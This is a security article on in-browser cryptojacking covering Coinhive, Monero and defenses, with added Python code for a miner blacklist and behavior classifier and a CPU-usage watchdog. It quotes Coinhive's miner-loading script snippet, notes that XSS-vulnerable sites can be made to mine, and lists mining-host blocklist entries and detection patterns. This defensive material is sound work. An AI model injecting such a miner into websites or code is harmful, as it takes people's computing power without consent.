In-Browser Cryptojacking: An Old Threat in a New Guise

by Pulkit Jain

Project: github.com/pjain03/spike_detector.  This is a utility that raises an alert if a particular process's CPU usage is too high.  Built with cryptojacking in mind, it takes an argument specifying which browser you are using and raises an alarm if that browser uses more than a specified share of your CPU's power, at which point you can verify the state of your computer.

Cryptocurrencies have become an extremely valuable resource in recent times which has attracted many to try to obtain them in vast quantities.

Not surprisingly, this increase in popularity has invited a measure of crime into the fold.  The goal of this article is to describe the state of cryptomining and cryptojacking, how it affects the general public, and discuss a few ways to detect and suppress it when it occurs in one's web browser.  Finally, we will touch upon the legitimacy of in-browser cryptomining as a possible alternative to ads as a source of income for websites.

Introduction

The high rewards that the field of cryptocurrencies currently offers have enticed many to devote large amounts of money, time, and energy to building a cryptocurrency portfolio that is as large and diversified as possible.

Some choose to purchase and sell crypto as they would stocks or shares, but others instead choose to undertake the task of "cryptomining."  The specifics of how cryptomining works are beyond the scope of this article, but, as a very brief background, it involves performing complex computational tasks in return for cryptocurrency.

The more one mines, the more crypto one acquires, and the more wealth one accumulates.  Increased computation power allows a cryptominer to mine more, and this has resulted in a race to gather as much hardware (GPUs, ASICs, etc.) as one can to mine as much as possible.  It has also, unsurprisingly, attracted cryptominers to participate in the malicious act of "cryptojacking."  As the term implies, cryptojacking refers to the unauthorized use of someone's computer in order to outsource the calculations needed to cryptomine.

To the Community

Cryptojacking manifested itself as a legitimate threat to large-scale businesses early in 2018 when attackers wrested control of resources from Tesla and Jenkins to mine cryptocurrency.

In terms of sheer cost, cryptomining on business resources (such as AWS servers as in the cases of the previously mentioned companies) can slow servers to a complete halt, cause an immense increase in power consumption (a Bitcoin transaction uses as much energy as a house does in a week), and, upon detection, adversely affect a company's trust-relationship with its users.

Due to the novelty of this attack, it is still not something businesses are necessarily aware of or taking seriously.  The fact that the frequency of these attacks is growing unboundedly makes it a severe security threat.

Not only does cryptojacking pose a risk to businesses, but it also affects many unaware end users.

In fact, Symantec, a cybersecurity company, reported that cryptojacking had increased by 8500 percent over the last quarter of 2017, likely due to the increased ease with which it could be done remotely through people's browsers.  Coinhive, a JavaScript library packaging all the tools required to perform cryptojacking, has been a key cause of this.  It provides the tools necessary for malicious individuals to mine cryptocurrency on someone's device without their permission.

Although such a utility, albeit in a reduced and less powerful form, existed prior to Coinhive in libraries such as Bitcoin Plus, in-browser cryptomining using Coinhive has resurfaced in a remarkable manner due to its ease of use and the availability of cryptocurrencies that can be mined easily in-browser (Monero).

The unauthorized cryptomining that both cryptojackers and websites perform increases the end-user's power consumption, causes their processors to overheat and slow down, and affects the longevity of their devices.  As such, to be able to detect and stop cryptojacking would be immensely useful to everyone.  This article will focus on the detection of in-browser cryptojacking to spread awareness amongst the average user.

In-Browser Mining

Bitcoin

A lot of people believe Bitcoin and the concept of cryptocurrencies to be synonymous and with good reason: it has been one of the most volatile and hence profitable cryptocurrencies in the market, and currently holds the largest well-known market cap for cryptocurrencies, which has brought it immense popularity.  But there are a lot more cryptocurrencies out there than just Bitcoin.

Due to technical reasons beyond the scope of this article, Bitcoin mining moved from being viable on CPUs to GPUs and now to ASICs (chips designed specifically to mine Bitcoin).  As such, Bitcoin is no longer a cryptocurrency that can be mined in-browser profitably.  Even if it could be, Bitcoin has considerable privacy issues that present adequate barriers to anyone looking to use it as a currency for illegal purposes.  For example, a major issue (which has had a few "messy workarounds") is that either end of a transaction risks exposing the complete sum of money owned by either party.

Monero

In sharp contrast to Bitcoin, Monero was developed specifically to be able to be mined through multiple different computational resources at once.

Compared to Bitcoin it is relatively new; however, it still has a considerable market cap, is monitored by law enforcement to a much lesser degree, and places a much greater emphasis on privacy.  These reasons have motivated criminals to move their transactions over to Monero.  A popular example of this is that the operator(s) of the immensely infamous WannaCry worm moved their ransom payments from Bitcoin to Monero for added untraceability.

In addition to this, it is extremely easy to mine Monero through the popular tool Coinhive, which is available as a JavaScript library and can be embedded into a website.  Initially created as an alternative source of revenue for businesses, whereby websites could mine cryptocurrency on their users' CPUs, it has become a dangerous cryptojacking tool because it neither requires user permission nor makes CPU throttling compulsory.  To Coinhive's credit, it maintains that it is firmly an alternative source of revenue (discussed further in this article), but because those restrictions are unenforced, there is no way to stop malicious people from abusing the tool.  Moreover, because it is available as a script that can be run easily, any website susceptible to XSS attacks (vulnerability 7 on OWASP's top ten) could be made part of a larger pool of websites that mine for a malicious attacker.

From the documentation on Coinhive's website, showing how easy it is to set up a miner with a pair of injectable script tags:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.User('SITE_KEY', 'john-doe');
    miner.start();
</script>

Others

Due to the rapid rise in the value of most cryptocurrencies, there are a lot of options for what can be mined, a popular one being Ethereum (the cryptocurrency with the second largest market cap).

But the issue with the most popular cryptocurrencies is that most of the mining that could have been done has been done and any future profitable mining requires costly dedicated machinery.  The ones that aren't as popular yet might not be worth mining.  Monero, however, provides the perfect medium between the two.

As for alternative mining software, there are a few worth mentioning, such as Coinhive CAPTCHA and Coinhave.  We will focus on Coinhive since it dominates the market by far.  In a 2018 study, one in 7000 websites (voluntarily or involuntarily) was found to be mining cryptocurrency, with Coinhive being the most popular tool used (93.82 percent).

Defenses: Detection and Blocking

Traditional techniques for blocking undesirable content on the Internet (such as those used by ad blockers), whereby a blacklist of cryptomining software/websites is maintained and requests are checked against it, are useful in blocking cryptomining.

As such, they should be utilized by all users.

In fact, Adblock Plus, a popular ad blocker, was upgraded to block such unauthorized mining.  NoCoin, another popular extension, maintained a more extensive blacklist of cryptomining scripts and CDNs, and has been hailed as a very popular option for negating unauthorized in-browser cryptomining.  However, as these tools grew in complexity, so did the cryptojackers.  Recently, these criminals have set up proxy networks to deliver the same content (Coinhive miners, etc.); the proxies are not caught by ordinary blacklist techniques and also save the criminals the fee they would otherwise pay to Coinhive.

MinerBlock is another browser extension that maintains blacklists much like the counterparts discussed above but, in addition, monitors the scripts used by websites for behavior resembling traditional cryptomining/Coinhive.

This serves to deter not only those proxy networks, but also inlined JavaScript in websites.  However, if there is anything we have learned as a community from the behavior of malicious cybercrime, it is that there will always be new ways for attackers to adapt to our defensive measures.  Therefore, when cryptojackers find another way to mine cryptocurrencies in-browser, it will resurface.
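As an added illustration of the two layers just described (this is not the code of Adblock Plus, NoCoin or MinerBlock), the following Python puts a hostname blacklist next to a behavior scan that only flags a script when several miner traits appear together.  The sample scripts, the proxy hostname and the blacklist contents are constructed for the example.  The miner re-hosted on a proxy domain slips past the blacklist but not the behavior check, which is exactly the gap the proxy networks exploit; the analytics script, which also uses a Worker and a WebSocket, is left alone.

```python
"""Added example: blacklist check plus behaviour scan for in-browser miners."""
import re
from urllib.parse import urlparse

# Constructed blacklist of mining hosts; real extension lists are far longer.
BLOCKLIST = {"coinhive.com", "coin-hive.com"}

# Traits of an in-browser miner.  None is damning alone (plenty of legitimate
# scripts use Workers or WebSockets), so several must appear together.
HEURISTICS = {
    "coinhive_api": re.compile(r"\bCoinHive\.(User|Anonymous)\b"),
    "cryptonight":  re.compile(r"cryptonight", re.IGNORECASE),  # Monero's hash
    "wasm":         re.compile(r"\bWebAssembly\."),
    "worker":       re.compile(r"\bnew\s+Worker\s*\("),
    "websocket":    re.compile(r"\bnew\s+WebSocket\s*\(\s*['\"]wss?://"),
}


def host_blocked(script_url, blocklist=BLOCKLIST):
    """Blacklist check: the script's hostname, or a parent domain, is listed."""
    if not script_url:          # an inline <script> has no URL to check
        return False
    host = (urlparse(script_url).hostname or "").lower()
    return any(host == b or host.endswith("." + b) for b in blocklist)


def behaviour_hits(source):
    """Names of the miner traits found in a script's source, sorted."""
    return sorted(name for name, rx in HEURISTICS.items() if rx.search(source))


def classify(script_url, source, blocklist=BLOCKLIST, min_hits=3):
    """'list' if the host is blacklisted, 'behaviour' if the source looks like a
    miner, otherwise 'allow'.  A direct Coinhive API call is decisive on its
    own; anything else needs min_hits independent traits."""
    if host_blocked(script_url, blocklist):
        return "list"
    hits = behaviour_hits(source)
    if "coinhive_api" in hits or len(hits) >= min_hits:
        return "behaviour"
    return "allow"


# Constructed sample scripts; every hostname below is a placeholder.
SAMPLES = {
    # the documented miner, loaded from Coinhive's own host
    "https://coinhive.com/lib/coinhive.min.js":
        "/* minified miner */",
    # the same miner re-hosted on a proxy domain absent from the blacklist
    "https://cdn.example-proxy.test/lib/m.js":
        "var w=new Worker('w.js');WebAssembly.instantiate(buf).then(run);"
        "var s=new WebSocket('wss://pool.example-proxy.test/');cryptonight_hash(job);",
    # an ordinary analytics script that also uses a Worker and a WebSocket
    "https://static.example.test/analytics.js":
        "var w=new Worker('a.js');var s=new WebSocket('wss://events.example.test/');",
}

# The inline snippet from the article, which has no URL at all.
INLINE = "var miner = new CoinHive.User('SITE_KEY', 'john-doe'); miner.start();"


def classify_samples():
    """Verdict for every constructed sample, keyed by URL ('inline' for INLINE)."""
    results = {url: classify(url, src) for url, src in SAMPLES.items()}
    results["inline"] = classify(None, INLINE)
    return results


if __name__ == "__main__":
    for url, verdict in classify_samples().items():
        print(f"{verdict:10} {url}")
```

The behavior scan is deliberately conservative: a lone Worker or WebSocket never triggers it, and `min_hits` can be raised if a site's legitimate scripts start collecting traits.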

As such, the only foolproof way to defend an individual user's resources is as follows:

  1. Keep updated versions of the aforementioned browser extensions.
  2. Monitor CPU usage/computer performance and if the root of it lies in the browser, be wary of cryptojacking.  (See project linked at the top of this article)
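The second step above, as an added example in Python: a per-process CPU watchdog of the kind the spike_detector project linked at the top describes.  This is not that project's code.  It sums the CPU time of every process whose name starts with the browser you name (multi-process browsers spawn many), reads the figures from /proc so sampling is Linux only, and, as an assumption of this example rather than something the article specifies, only alarms once the load has stayed above the threshold for several consecutive intervals, so a brief burst from a page load is ignored while a miner's sustained load is not.  The threshold logic itself is platform independent and is what the stat-line and sample-series values below exercise.

```python
"""Added example: alert when a browser's CPU usage stays above a threshold."""
import argparse
import os
import sys
import time


def interval_percents(samples, ncpu=1):
    """Turn successive (cpu_seconds, wall_seconds) samples into the share of
    total machine CPU (0-100) used during each interval.  cpu_seconds is
    utime+stime summed over every process being watched."""
    out = []
    for (c0, w0), (c1, w1) in zip(samples, samples[1:]):
        wall = w1 - w0
        if wall <= 0:
            continue
        # a watched process exiting makes the sum drop; clamp instead of going negative
        out.append(max(0.0, 100.0 * (c1 - c0) / wall / ncpu))
    return out


def should_alert(percents, threshold, consecutive=3):
    """True once the last `consecutive` intervals all exceed `threshold`."""
    if len(percents) < consecutive:
        return False
    return all(p > threshold for p in percents[-consecutive:])


def cpu_ticks_from_stat(stat_text):
    """utime + stime (clock ticks) from one /proc/<pid>/stat line.  The comm
    field sits in parentheses and may contain spaces, so split after the
    last ')' rather than on whitespace from the start of the line."""
    fields = stat_text[stat_text.rindex(")") + 2:].split()
    utime, stime = int(fields[11]), int(fields[12])   # fields 14 and 15
    return utime + stime


def _clk_tck():
    try:
        return os.sysconf("SC_CLK_TCK")
    except (AttributeError, ValueError, OSError):
        return 100


def process_cpu_seconds(pid):
    with open(f"/proc/{pid}/stat") as f:
        return cpu_ticks_from_stat(f.read()) / _clk_tck()


def browser_pids(name):
    """All PIDs whose /proc/<pid>/comm starts with `name`."""
    pids = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as f:
                comm = f.read().strip()
        except OSError:
            continue
        if comm.lower().startswith(name.lower()):
            pids.append(int(entry))
    return pids


def watch(name, threshold, interval=2.0, consecutive=3):
    ncpu = os.cpu_count() or 1
    prev, percents = None, []
    while True:
        pids = browser_pids(name)
        cpu = 0.0
        for pid in pids:
            try:
                cpu += process_cpu_seconds(pid)
            except OSError:
                pass                # process exited between listing and reading
        cur = (cpu, time.monotonic())
        if prev is not None:
            percents = (percents + interval_percents([prev, cur], ncpu))[-consecutive:]
            print(f"{name}: {len(pids)} processes, {percents[-1]:.1f}% of total CPU")
            if should_alert(percents, threshold, consecutive):
                print(f"ALERT: {name} has used over {threshold}% of your CPU for "
                      f"{consecutive * interval:.0f}s; check which tabs are open.")
        prev = cur
        time.sleep(interval)


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="Alert when a browser's CPU use stays high.")
    ap.add_argument("browser", help="process name to watch, e.g. firefox or chrome")
    ap.add_argument("--threshold", type=float, default=50.0, help="percent of total CPU")
    ap.add_argument("--interval", type=float, default=2.0, help="seconds between samples")
    ap.add_argument("--consecutive", type=int, default=3, help="intervals above threshold")
    a = ap.parse_args()
    if not os.path.isdir("/proc"):
        sys.exit("sampling via /proc needs Linux; the threshold logic itself is portable")
    watch(a.browser, a.threshold, a.interval, a.consecutive)
```

Run it as `python3 spike_watch.py firefox --threshold 60`; an alarm tells you only that the browser has been busy, so the next step is to look at which tab is responsible before concluding anything.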

Conclusion

Seeing as cryptojacking has been growing at a frightening rate, it is important that the security community, big corporations, and casual users be aware of the threat that it poses.

Furthermore, it is important that users be aware of the resources at their disposal, and of the reasons and thought behind it all.  As such, it is important to consider Coinhive's purported purpose: it aims to be an alternative source of income for websites.  As long as websites can mine using Coinhive without unboundedly charging their users' CPUs (as The Pirate Bay did very infamously), it might help websites supplement their revenue and improve user experiences on the Internet by reducing the number of ads, all without choking up their users' resources.

However, by placing the onus of this in the hands of the implementers without necessitating user permission or consideration (in the form of throttled mining), Coinhive has created a tool that can be used to wreak massive amounts of havoc which must be defended against.

If, however, we are able to stop the websites that choke up resources and allow websites that do not to continue to perform minor cryptomining, we might be able to safely reach an optimal user experience on the web.
